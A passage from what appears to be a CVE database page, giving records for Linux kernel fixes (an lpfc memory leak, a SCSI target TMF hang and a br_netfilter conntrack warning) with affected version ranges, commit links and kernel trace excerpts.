          "url": "https://git.kernel.org/stable/c/5abffb66d12bcac84bf7b66389c571b8bb6e82bd"
        }
      ],
      "title": "drm: Check output polling initialized before disabling",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35927",
    "datePublished": "2024-05-19T10:10:37.069Z",
    "dateReserved": "2024-05-17T13:50:33.128Z",
    "dateUpdated": "2025-06-19T12:37:41.851Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35930 (GCVE-0-2024-35930)

Vulnerability from cvelistv5 – Published: 2024-05-19 10:10 – Updated: 2025-05-21 09:12

Title

scsi: lpfc: Fix possible memory leak in lpfc_rcv_padisc()

Summary

In the Linux kernel, the following vulnerability has been resolved: scsi: lpfc: Fix possible memory leak in lpfc_rcv_padisc() The call to lpfc_sli4_resume_rpi() in lpfc_rcv_padisc() may return an unsuccessful status. In such cases, the elsiocb is not issued, the completion is not called, and thus the elsiocb resource is leaked. Check return value after calling lpfc_sli4_resume_rpi() and conditionally release the elsiocb resource.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/edf82aa7e9eb864a0…
	https://git.kernel.org/stable/c/e2cd32435b1dff3d6…
	https://git.kernel.org/stable/c/c473288f27d150144…
	https://git.kernel.org/stable/c/7849e6f8410da9638…
	https://git.kernel.org/stable/c/ee0b5f96b6d66a1e6…
	https://git.kernel.org/stable/c/07a2aa674fca67931…
	https://git.kernel.org/stable/c/3320126ed3afbc119…
	https://git.kernel.org/stable/c/2ae917d4bcab80ab3…

Impacted products

Vendor

Product

Version

Linux

Affected: 6b5151fd7baec6812fece993ddd7a2cf9fd0125f , < edf82aa7e9eb864a09229392054d131b34a5c9e8 (git)
Affected: 6b5151fd7baec6812fece993ddd7a2cf9fd0125f , < e2cd32435b1dff3d63759476a3abc878e02fb6c8 (git)
Affected: 6b5151fd7baec6812fece993ddd7a2cf9fd0125f , < c473288f27d15014447de5a891bdf22a0695847a (git)
Affected: 6b5151fd7baec6812fece993ddd7a2cf9fd0125f , < 7849e6f8410da96384e3d1f6b6d730f095142dc7 (git)
Affected: 6b5151fd7baec6812fece993ddd7a2cf9fd0125f , < ee0b5f96b6d66a1e6698228dcb41df11ec7f352f (git)
Affected: 6b5151fd7baec6812fece993ddd7a2cf9fd0125f , < 07a2aa674fca679316b8ac51440adb895b53a7cf (git)
Affected: 6b5151fd7baec6812fece993ddd7a2cf9fd0125f , < 3320126ed3afbc11934502319b340f91a4d61c8f (git)
Affected: 6b5151fd7baec6812fece993ddd7a2cf9fd0125f , < 2ae917d4bcab80ab304b774d492e2fcd6c52c06b (git)

Linux

Affected: 3.4
Unaffected: 0 , < 3.4 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.155 , ≤ 5.15.* (semver)
Unaffected: 6.1.86 , ≤ 6.1.* (semver)
Unaffected: 6.6.27 , ≤ 6.6.* (semver)
Unaffected: 6.8.6 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35930",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-17T17:38:29.862018Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-17T17:40:55.711Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.028Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/edf82aa7e9eb864a09229392054d131b34a5c9e8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e2cd32435b1dff3d63759476a3abc878e02fb6c8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c473288f27d15014447de5a891bdf22a0695847a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7849e6f8410da96384e3d1f6b6d730f095142dc7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ee0b5f96b6d66a1e6698228dcb41df11ec7f352f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/07a2aa674fca679316b8ac51440adb895b53a7cf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3320126ed3afbc11934502319b340f91a4d61c8f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2ae917d4bcab80ab304b774d492e2fcd6c52c06b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/scsi/lpfc/lpfc_nportdisc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "edf82aa7e9eb864a09229392054d131b34a5c9e8",
              "status": "affected",
              "version": "6b5151fd7baec6812fece993ddd7a2cf9fd0125f",
              "versionType": "git"
            },
            {
              "lessThan": "e2cd32435b1dff3d63759476a3abc878e02fb6c8",
              "status": "affected",
              "version": "6b5151fd7baec6812fece993ddd7a2cf9fd0125f",
              "versionType": "git"
            },
            {
              "lessThan": "c473288f27d15014447de5a891bdf22a0695847a",
              "status": "affected",
              "version": "6b5151fd7baec6812fece993ddd7a2cf9fd0125f",
              "versionType": "git"
            },
            {
              "lessThan": "7849e6f8410da96384e3d1f6b6d730f095142dc7",
              "status": "affected",
              "version": "6b5151fd7baec6812fece993ddd7a2cf9fd0125f",
              "versionType": "git"
            },
            {
              "lessThan": "ee0b5f96b6d66a1e6698228dcb41df11ec7f352f",
              "status": "affected",
              "version": "6b5151fd7baec6812fece993ddd7a2cf9fd0125f",
              "versionType": "git"
            },
            {
              "lessThan": "07a2aa674fca679316b8ac51440adb895b53a7cf",
              "status": "affected",
              "version": "6b5151fd7baec6812fece993ddd7a2cf9fd0125f",
              "versionType": "git"
            },
            {
              "lessThan": "3320126ed3afbc11934502319b340f91a4d61c8f",
              "status": "affected",
              "version": "6b5151fd7baec6812fece993ddd7a2cf9fd0125f",
              "versionType": "git"
            },
            {
              "lessThan": "2ae917d4bcab80ab304b774d492e2fcd6c52c06b",
              "status": "affected",
              "version": "6b5151fd7baec6812fece993ddd7a2cf9fd0125f",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/scsi/lpfc/lpfc_nportdisc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.4"
            },
            {
              "lessThan": "3.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.155",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.86",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.27",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.155",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.86",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.27",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.6",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: lpfc: Fix possible memory leak in lpfc_rcv_padisc()\n\nThe call to lpfc_sli4_resume_rpi() in lpfc_rcv_padisc() may return an\nunsuccessful status.  In such cases, the elsiocb is not issued, the\ncompletion is not called, and thus the elsiocb resource is leaked.\n\nCheck return value after calling lpfc_sli4_resume_rpi() and conditionally\nrelease the elsiocb resource."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-21T09:12:38.106Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/edf82aa7e9eb864a09229392054d131b34a5c9e8"
        },
        {
          "url": "https://git.kernel.org/stable/c/e2cd32435b1dff3d63759476a3abc878e02fb6c8"
        },
        {
          "url": "https://git.kernel.org/stable/c/c473288f27d15014447de5a891bdf22a0695847a"
        },
        {
          "url": "https://git.kernel.org/stable/c/7849e6f8410da96384e3d1f6b6d730f095142dc7"
        },
        {
          "url": "https://git.kernel.org/stable/c/ee0b5f96b6d66a1e6698228dcb41df11ec7f352f"
        },
        {
          "url": "https://git.kernel.org/stable/c/07a2aa674fca679316b8ac51440adb895b53a7cf"
        },
        {
          "url": "https://git.kernel.org/stable/c/3320126ed3afbc11934502319b340f91a4d61c8f"
        },
        {
          "url": "https://git.kernel.org/stable/c/2ae917d4bcab80ab304b774d492e2fcd6c52c06b"
        }
      ],
      "title": "scsi: lpfc: Fix possible memory leak in lpfc_rcv_padisc()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35930",
    "datePublished": "2024-05-19T10:10:39.051Z",
    "dateReserved": "2024-05-17T13:50:33.129Z",
    "dateUpdated": "2025-05-21T09:12:38.106Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26845 (GCVE-0-2024-26845)

Vulnerability from cvelistv5 – Published: 2024-04-17 10:10 – Updated: 2026-01-05 10:34

Title

scsi: target: core: Add TMF to tmr_list handling

Summary

In the Linux kernel, the following vulnerability has been resolved: scsi: target: core: Add TMF to tmr_list handling An abort that is responded to by iSCSI itself is added to tmr_list but does not go to target core. A LUN_RESET that goes through tmr_list takes a refcounter on the abort and waits for completion. However, the abort will be never complete because it was not started in target core. Unable to locate ITT: 0x05000000 on CID: 0 Unable to locate RefTaskTag: 0x05000000 on CID: 0. wait_for_tasks: Stopping tmf LUN_RESET with tag 0x0 ref_task_tag 0x0 i_state 34 t_state ISTATE_PROCESSING refcnt 2 transport_state active,stop,fabric_stop wait for tasks: tmf LUN_RESET with tag 0x0 ref_task_tag 0x0 i_state 34 t_state ISTATE_PROCESSING refcnt 2 transport_state active,stop,fabric_stop ... INFO: task kworker/0:2:49 blocked for more than 491 seconds. task:kworker/0:2 state:D stack: 0 pid: 49 ppid: 2 flags:0x00000800 Workqueue: events target_tmr_work [target_core_mod] Call Trace: __switch_to+0x2c4/0x470 _schedule+0x314/0x1730 schedule+0x64/0x130 schedule_timeout+0x168/0x430 wait_for_completion+0x140/0x270 target_put_cmd_and_wait+0x64/0xb0 [target_core_mod] core_tmr_lun_reset+0x30/0xa0 [target_core_mod] target_tmr_work+0xc8/0x1b0 [target_core_mod] process_one_work+0x2d4/0x5d0 worker_thread+0x78/0x6c0 To fix this, only add abort to tmr_list if it will be handled by target core.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/11f3fe5001ed05721…
	https://git.kernel.org/stable/c/168ed59170de1fd72…
	https://git.kernel.org/stable/c/a9849b67b4402a12e…
	https://git.kernel.org/stable/c/e717bd412001495f1…
	https://git.kernel.org/stable/c/36bc5040c863b44af…
	https://git.kernel.org/stable/c/bd508f96b5fef96d8…
	https://git.kernel.org/stable/c/83ab68168a3d990d5…

Impacted products

Vendor

Product

Version

Linux

Affected: 2281c95fe751325874d135b237ecdcd3bc34cc26 , < 11f3fe5001ed05721e641f0ecaa7a73b7deb245d (git)
Affected: 2281c95fe751325874d135b237ecdcd3bc34cc26 , < 168ed59170de1fd7274080fe102216162d6826cf (git)
Affected: 2281c95fe751325874d135b237ecdcd3bc34cc26 , < a9849b67b4402a12eb35eadc9306c1ef9847d53d (git)
Affected: 2281c95fe751325874d135b237ecdcd3bc34cc26 , < e717bd412001495f17400bfc09f606f1b594ef5a (git)
Affected: 2281c95fe751325874d135b237ecdcd3bc34cc26 , < 36bc5040c863b44af06094b22f1e50059227b9cb (git)
Affected: 2281c95fe751325874d135b237ecdcd3bc34cc26 , < bd508f96b5fef96d8a0ce9cbb211d82bcfc2341f (git)
Affected: 2281c95fe751325874d135b237ecdcd3bc34cc26 , < 83ab68168a3d990d5ff39ab030ad5754cbbccb25 (git)

Linux

Affected: 5.1
Unaffected: 0 , < 5.1 (semver)
Unaffected: 5.4.270 , ≤ 5.4.* (semver)
Unaffected: 5.10.211 , ≤ 5.10.* (semver)
Unaffected: 5.15.150 , ≤ 5.15.* (semver)
Unaffected: 6.1.80 , ≤ 6.1.* (semver)
Unaffected: 6.6.19 , ≤ 6.6.* (semver)
Unaffected: 6.7.7 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26845",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-28T19:57:59.068880Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:48:22.368Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:13.663Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/425a571a7e6fc389954cf2564e1edbba3740e171"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/11f3fe5001ed05721e641f0ecaa7a73b7deb245d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/168ed59170de1fd7274080fe102216162d6826cf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a9849b67b4402a12eb35eadc9306c1ef9847d53d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e717bd412001495f17400bfc09f606f1b594ef5a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/36bc5040c863b44af06094b22f1e50059227b9cb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/bd508f96b5fef96d8a0ce9cbb211d82bcfc2341f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/83ab68168a3d990d5ff39ab030ad5754cbbccb25"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/target/target_core_device.c",
            "drivers/target/target_core_transport.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "11f3fe5001ed05721e641f0ecaa7a73b7deb245d",
              "status": "affected",
              "version": "2281c95fe751325874d135b237ecdcd3bc34cc26",
              "versionType": "git"
            },
            {
              "lessThan": "168ed59170de1fd7274080fe102216162d6826cf",
              "status": "affected",
              "version": "2281c95fe751325874d135b237ecdcd3bc34cc26",
              "versionType": "git"
            },
            {
              "lessThan": "a9849b67b4402a12eb35eadc9306c1ef9847d53d",
              "status": "affected",
              "version": "2281c95fe751325874d135b237ecdcd3bc34cc26",
              "versionType": "git"
            },
            {
              "lessThan": "e717bd412001495f17400bfc09f606f1b594ef5a",
              "status": "affected",
              "version": "2281c95fe751325874d135b237ecdcd3bc34cc26",
              "versionType": "git"
            },
            {
              "lessThan": "36bc5040c863b44af06094b22f1e50059227b9cb",
              "status": "affected",
              "version": "2281c95fe751325874d135b237ecdcd3bc34cc26",
              "versionType": "git"
            },
            {
              "lessThan": "bd508f96b5fef96d8a0ce9cbb211d82bcfc2341f",
              "status": "affected",
              "version": "2281c95fe751325874d135b237ecdcd3bc34cc26",
              "versionType": "git"
            },
            {
              "lessThan": "83ab68168a3d990d5ff39ab030ad5754cbbccb25",
              "status": "affected",
              "version": "2281c95fe751325874d135b237ecdcd3bc34cc26",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/target/target_core_device.c",
            "drivers/target/target_core_transport.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.1"
            },
            {
              "lessThan": "5.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.270",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.211",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.150",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.80",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.19",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.270",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.211",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.150",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.80",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.19",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.7",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: target: core: Add TMF to tmr_list handling\n\nAn abort that is responded to by iSCSI itself is added to tmr_list but does\nnot go to target core. A LUN_RESET that goes through tmr_list takes a\nrefcounter on the abort and waits for completion. However, the abort will\nbe never complete because it was not started in target core.\n\n Unable to locate ITT: 0x05000000 on CID: 0\n Unable to locate RefTaskTag: 0x05000000 on CID: 0.\n wait_for_tasks: Stopping tmf LUN_RESET with tag 0x0 ref_task_tag 0x0 i_state 34 t_state ISTATE_PROCESSING refcnt 2 transport_state active,stop,fabric_stop\n wait for tasks: tmf LUN_RESET with tag 0x0 ref_task_tag 0x0 i_state 34 t_state ISTATE_PROCESSING refcnt 2 transport_state active,stop,fabric_stop\n...\n INFO: task kworker/0:2:49 blocked for more than 491 seconds.\n task:kworker/0:2     state:D stack:    0 pid:   49 ppid:     2 flags:0x00000800\n Workqueue: events target_tmr_work [target_core_mod]\nCall Trace:\n __switch_to+0x2c4/0x470\n _schedule+0x314/0x1730\n schedule+0x64/0x130\n schedule_timeout+0x168/0x430\n wait_for_completion+0x140/0x270\n target_put_cmd_and_wait+0x64/0xb0 [target_core_mod]\n core_tmr_lun_reset+0x30/0xa0 [target_core_mod]\n target_tmr_work+0xc8/0x1b0 [target_core_mod]\n process_one_work+0x2d4/0x5d0\n worker_thread+0x78/0x6c0\n\nTo fix this, only add abort to tmr_list if it will be handled by target\ncore."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:34:40.167Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/11f3fe5001ed05721e641f0ecaa7a73b7deb245d"
        },
        {
          "url": "https://git.kernel.org/stable/c/168ed59170de1fd7274080fe102216162d6826cf"
        },
        {
          "url": "https://git.kernel.org/stable/c/a9849b67b4402a12eb35eadc9306c1ef9847d53d"
        },
        {
          "url": "https://git.kernel.org/stable/c/e717bd412001495f17400bfc09f606f1b594ef5a"
        },
        {
          "url": "https://git.kernel.org/stable/c/36bc5040c863b44af06094b22f1e50059227b9cb"
        },
        {
          "url": "https://git.kernel.org/stable/c/bd508f96b5fef96d8a0ce9cbb211d82bcfc2341f"
        },
        {
          "url": "https://git.kernel.org/stable/c/83ab68168a3d990d5ff39ab030ad5754cbbccb25"
        }
      ],
      "title": "scsi: target: core: Add TMF to tmr_list handling",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26845",
    "datePublished": "2024-04-17T10:10:09.337Z",
    "dateReserved": "2024-02-19T14:20:24.182Z",
    "dateUpdated": "2026-01-05T10:34:40.167Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-27018 (GCVE-0-2024-27018)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:30 – Updated: 2025-11-04 17:17

Title

netfilter: br_netfilter: skip conntrack input hook for promisc packets

Summary

In the Linux kernel, the following vulnerability has been resolved: netfilter: br_netfilter: skip conntrack input hook for promisc packets For historical reasons, when bridge device is in promisc mode, packets that are directed to the taps follow bridge input hook path. This patch adds a workaround to reset conntrack for these packets. Jianbo Liu reports warning splats in their test infrastructure where cloned packets reach the br_netfilter input hook to confirm the conntrack object. Scratch one bit from BR_INPUT_SKB_CB to annotate that this packet has reached the input hook because it is passed up to the bridge device to reach the taps. [ 57.571874] WARNING: CPU: 1 PID: 0 at net/bridge/br_netfilter_hooks.c:616 br_nf_local_in+0x157/0x180 [br_netfilter] [ 57.572749] Modules linked in: xt_MASQUERADE nf_conntrack_netlink nfnetlink iptable_nat xt_addrtype xt_conntrack nf_nat br_netfilter rpcsec_gss_krb5 auth_rpcgss oid_registry overlay rpcrdma rdma_ucm ib_iser libiscsi scsi_transport_isc si ib_umad rdma_cm ib_ipoib iw_cm ib_cm mlx5_ib ib_uverbs ib_core mlx5ctl mlx5_core [ 57.575158] CPU: 1 PID: 0 Comm: swapper/1 Not tainted 6.8.0+ #19 [ 57.575700] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 [ 57.576662] RIP: 0010:br_nf_local_in+0x157/0x180 [br_netfilter] [ 57.577195] Code: fe ff ff 41 bd 04 00 00 00 be 04 00 00 00 e9 4a ff ff ff be 04 00 00 00 48 89 ef e8 f3 a9 3c e1 66 83 ad b4 00 00 00 04 eb 91 <0f> 0b e9 f1 fe ff ff 0f 0b e9 df fe ff ff 48 89 df e8 b3 53 47 e1 [ 57.578722] RSP: 0018:ffff88885f845a08 EFLAGS: 00010202 [ 57.579207] RAX: 0000000000000002 RBX: ffff88812dfe8000 RCX: 0000000000000000 [ 57.579830] RDX: ffff88885f845a60 RSI: ffff8881022dc300 RDI: 0000000000000000 [ 57.580454] RBP: ffff88885f845a60 R08: 0000000000000001 R09: 0000000000000003 [ 57.581076] R10: 00000000ffff1300 R11: 0000000000000002 R12: 0000000000000000 [ 57.581695] R13: ffff8881047ffe00 R14: ffff888108dbee00 R15: ffff88814519b800 [ 57.582313] FS: 0000000000000000(0000) GS:ffff88885f840000(0000) knlGS:0000000000000000 [ 57.583040] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 57.583564] CR2: 000000c4206aa000 CR3: 0000000103847001 CR4: 0000000000370eb0 [ 57.584194] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 57.584820] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 57.585440] Call Trace: [ 57.585721] <IRQ> [ 57.585976] ? __warn+0x7d/0x130 [ 57.586323] ? br_nf_local_in+0x157/0x180 [br_netfilter] [ 57.586811] ? report_bug+0xf1/0x1c0 [ 57.587177] ? handle_bug+0x3f/0x70 [ 57.587539] ? exc_invalid_op+0x13/0x60 [ 57.587929] ? asm_exc_invalid_op+0x16/0x20 [ 57.588336] ? br_nf_local_in+0x157/0x180 [br_netfilter] [ 57.588825] nf_hook_slow+0x3d/0xd0 [ 57.589188] ? br_handle_vlan+0x4b/0x110 [ 57.589579] br_pass_frame_up+0xfc/0x150 [ 57.589970] ? br_port_flags_change+0x40/0x40 [ 57.590396] br_handle_frame_finish+0x346/0x5e0 [ 57.590837] ? ipt_do_table+0x32e/0x430 [ 57.591221] ? br_handle_local_finish+0x20/0x20 [ 57.591656] br_nf_hook_thresh+0x4b/0xf0 [br_netfilter] [ 57.592286] ? br_handle_local_finish+0x20/0x20 [ 57.592802] br_nf_pre_routing_finish+0x178/0x480 [br_netfilter] [ 57.593348] ? 